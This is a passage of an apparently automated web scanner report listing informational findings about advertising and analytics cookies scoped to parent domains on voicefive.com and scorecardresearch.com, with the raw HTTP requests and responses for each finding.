FsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

10.41. http://ar.voicefive.com/b/wc_beacon.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=recruitFrequency-%3E1,pid-%3Ep85001580,prad-%3E62126627,ar_c-%3E42474885,methodology-%3E4,inv-%3Einv_3_300x250,grp-%3E1,location-%3Ehttp%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5387288.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa.tribalfusion.com%2Fh.click%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2.html%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F,referrer-%3Ehttp%3A%2F%2Fa.tribalfusion.com%2Fp.media%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag.html,path-%3Ehttp%3A%2F%2Far.voicefive.com%2Fbmx3%2F,branding-%3Eb3,version-%3E3.0,site-%3E500,delay-%3E5000,dom-%3E121,inv_type-%3E3,ts-%3E1308233340.003,&1308233342527 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q2/728/L41/1958421561/x90/USNetwork/RS_SELL_2011Q2_TF_GEN_728/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1958421561?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; BMX_G=method->-1,ts->1308225881; ar_p97174789=exp=8&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:48:09 2011&prad=242390407&arc=178113654&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 14:09:01 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.42. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; expires=Wed 14-Sep-2011 18:27:25 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p45555483&PRAd=64578880&AR_C=36816991 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248841013&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; BMX_G=recruitFrequency%2D%3E1%2Cpid%2D%3Ep85001580%2Cprad%2D%3E62126627%2Car_c%2D%3E42474885%2Cmethodology%2D%3E4%2Cinv%2D%3Einv_3_300x250%2Cgrp%2D%3E1%2Clocation%2D%3Ehttp%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2FN3867%2E270604%2EB3%2FB5387288%2E7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fh%2Eclick%2FaWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq%2Fhttp%3A%2F%2Fb3%2Emookie1%2Ecom%2FRealMedia%2Fads%2Fclick_lx%2Eads%2FTribalFusionB3%2FRadioShack%2FSELL_2011Q2%2F728%2FL41%2F1958421561%2Fx90%2FUSNetwork%2FRS_SELL_2011Q2_TF_GEN_728%2FRadioShack_SELL_2011Q2%2Ehtml%2F726348573830334f56626741436d4566%3F%3Bord%3D1958421561%3F%2Creferrer%2D%3Ehttp%3A%2F%2Fa%2Etribalfusion%2Ecom%2Fp%2Emedia%2FaMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d%2F2546166%2FadTag%2Ehtml%2Cpath%2D%3Ehttp%3A%2F%2Far%2Evoicefive%2Ecom%2Fbmx3%2F%2Cbranding%2D%3Eb3%2Cversion%2D%3E3%2E0%2Csite%2D%3E500%2Cdelay%2D%3E5000%2Cdom%2D%3E121%2Cinv_type%2D%3E3%2Cts%2D%3E1308233340%2E003%2C; ar_p97174789=exp=10&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 18:06:41 2011&prad=242390405&arc=178114119&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 18:27:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; expires=Wed 14-Sep-2011 18:27:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29855

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"64578880",Pid:"p45555483",Arc:"36816991",Location:CO
...[SNIP]...

10.43. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; expires=Wed 14-Sep-2011 14:08:59 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=62126627&AR_C=42474885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q2/728/L41/1958421561/x90/USNetwork/RS_SELL_2011Q2_TF_GEN_728/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1958421561?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; BMX_G=method->-1,ts->1308225881; ar_p97174789=exp=8&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:48:09 2011&prad=242390407&arc=178113654&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 14:08:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; expires=Wed 14-Sep-2011 14:08:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 29397

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62126627",Pid:"p85001580",Arc:"42474885",Location:CO
...[SNIP]...

10.44. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:24 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:24 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 13:08:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=7&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 13:08:24 2011&prad=242390405&arc=206438244&; expires=Wed 14-Sep-2011 13:08:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26174

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"242390405",Pid:"p97174789",Arc:"206438244",Location:
...[SNIP]...

10.45. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 10:51:03 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=98790672&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.ilslaunch.com%252Fmission-control%252Fmission-skyterra-1%26jsref%3Dhttp%253A%252F%252Fwww.lightsquared.com%252F%26rnd%3D1308221464149&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.ilslaunch.com%2Fmission-control%2Fmission-skyterra-1&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.ilslaunch.com%2Fmission-control%2Fmission-skyterra-1&jsref=http%3A%2F%2Fwww.lightsquared.com%2F&rnd=1308221464149
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 16 Jun 2011 10:51:03 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 10:51:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.46. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 11:22:21 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=164255355&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fhome-page HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 16 Jun 2011 11:22:21 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 15-Jun-2013 11:22:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.47. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=4a757a7-24.143.206.42-1305663172; expires=Sat, 15-Jun-2013 12:51:27 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=242390405&c4=186884938&c5=1&c6=5&c7=tue%20may%2017%2020%3A12%3A51%202011&c8=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308225880353%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&c9=&c10=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&c15=&1308225882839 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; ar_p97174789=exp=5&initExp=Tue May 17 20:12:51 2011&recExp=Thu Jun 16 12:04:41 2011&prad=242390405&arc=186884938&; BMX_G=method->-1,ts->1308225881; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 16 Jun 2011 12:51:27 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Sat, 15-Jun-2013 12:51:27 GMT; path=/; domain=.voicefive.com
